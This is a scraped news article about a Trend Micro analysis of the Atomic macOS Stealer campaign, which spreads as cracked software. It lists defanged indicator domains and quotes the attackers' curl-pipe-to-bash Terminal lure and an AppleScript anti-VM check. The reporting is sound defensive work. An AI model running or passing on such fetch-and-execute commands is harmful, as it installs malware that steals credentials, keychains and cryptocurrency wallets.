A sophisticated malware campaign targeting macOS users has emerged, exploiting the widespread desire for free software to deliver the notorious Atomic macOS Stealer (AMOS).<\/p>\n
This information-stealing malware<\/a> masquerades as cracked versions of popular applications, tricking unsuspecting users into compromising their own systems while believing they are simply downloading free software alternatives.<\/p>\n The campaign represents a significant shift in the cybersecurity landscape, challenging the long-held perception that macOS devices are inherently safer than their Windows counterparts.<\/p>\n As Apple devices gain popularity among professionals and high-value targets, cybercriminals have adapted their tactics to capitalize on this growing market.<\/p>\n The attackers demonstrate remarkable sophistication by employing multiple distribution methods and continuously rotating their infrastructure to evade detection.<\/p>\n The malware\u2019s reach extends far beyond simple data theft, targeting sensitive information including browser credentials, cryptocurrency wallets, Telegram conversations, VPN<\/a> configurations, keychain data, Apple Notes, and various document files.<\/p>\n This comprehensive approach to data collection makes AMOS particularly dangerous for both individual users and enterprise environments, where compromised credentials can lead to broader organizational breaches.<\/p>\n Trend Micro researchers identified<\/a> this campaign through their Managed Detection and Response services, noting the malware\u2019s ability to bypass traditional security measures through social engineering rather than technical exploits.<\/p>\n The analysis revealed that attackers primarily distribute AMOS through websites like haxmac.cc, which hosts numerous cracked macOS applications and serves as the initial infection vector.<\/p>\n The distribution strategy involves redirecting users through a complex network of rotating domains including dtxxbz1jq070725p93[.]cfd, goipbp9080425d4[.]cfd, and im9ov070725iqu[.]cfd.<\/p>\n These redirectors eventually lead victims to landing pages hosted on domains such as ekochist.com, misshon.com, and toutentris.com, where they encounter two primary installation methods.<\/p>\n The most successful distribution method involves instructing users to execute malicious commands directly in the macOS Terminal application.<\/p>\n This approach proves particularly effective because it bypasses Apple\u2019s Gatekeeper security feature, which normally prevents unsigned applications from running.<\/p>\n Users are presented with seemingly innocuous commands like:-<\/p>\n Once executed, this command downloads and runs an installation script that performs several critical operations.<\/p>\n The script first downloads an AppleScript file named \u201cupdate\u201d to the temporary directory, which then conducts anti-virtualization checks to avoid detection in sandboxed environments:-<\/p>\n The malware establishes persistence through a sophisticated multi-component system involving three key files. The primary stealer binary (.helper) performs the actual data collection, while a monitoring script ([.]agent) runs continuously to detect user login sessions.<\/p>\n A LaunchDaemon configuration file (com[.]finder[.]helper[.]plist) ensures the malware survives system reboots by automatically launching the monitoring script at startup.<\/p>\n The persistence<\/a> mechanism creates an infinite loop where the .agent script continuously monitors for active user sessions and executes the .helper binary in the appropriate user context.<\/p>\n This design ensures consistent operation while maintaining a low profile, as the malware operates through legitimate system processes and avoids creating obvious indicators of compromise.<\/p>\n Data exfiltration occurs through compressed ZIP archives sent via HTTP POST requests to command-and-control servers, with custom headers containing unique identifiers for each infected system.<\/p>\n The malware\u2019s comprehensive data collection<\/a> capabilities, combined with its sophisticated evasion and persistence mechanisms, make it a formidable threat to macOS users who download software from untrusted sources.<\/p>\n The post Atomic Stealer Disguised as Cracked Software Attacking macOS Users<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhziDsCkaH5WAQ2l3sc8rTaUK4bSNuv3bDOCBewx7u_jqSt7jto36UhrqpvzJN5AnTg_HVkEB3udI8SqhXmLRBG-ZB95qzfsLJAGWbI7cHW_dI4D4pZt7aHDVyQKYQf2UGMKHttRcfMT_mxiMF6agT0X5jik5mTGWFSaHq5wACpLzsClKK6uraRNJapq3c\/s16000\/haxmac%255B.%255Dcc%2520also%2520hosts%2520other%2520%25E2%2580%259Ccracked%25E2%2580%259D%2520software%2520for%2520macOS%2520%28Source%2520-%2520Trend%2520Micro%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjNta7DMIz3FYlPwhjTwMp7kPvTdZlzQnPSAfFu5RwOx9JI-CQPKVp2gwjwHzIPFb7_LU9XuBhI9FqDpCgVAnGsynnn6ijAQHMd2CKR8ysZzYuedEeECiKVSy33jxoUb_NUn7e5k1D4vSEFjL24MAhf7_U_wB1-q8_domEO5s_wqgEIjQnQOuzRtPJQQfk\/s16000\/AMOS%25E2%2580%2599%2520infection%2520chain%2520and%2520delivery%2520process%2520%28Source%2520-%2520Trend%2520Micro%29.webp?ssl=1\")
Terminal-Based Installation and Persistence Mechanisms<\/strong><\/h2>\n
curl - fsSL https[:]\/\/goatramz[.]com\/get4\/install[.]sh | bash<\/code><\/pre>\nset memData to do shell script \"system_profiler SPMemoryDataType\"\nif memData contains \"QEMU\" or memData contains \"VMware\" then``` set exitCode to 100\nelse\n set exitCode to 0\nend if<\/code><\/pre>\nBoost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n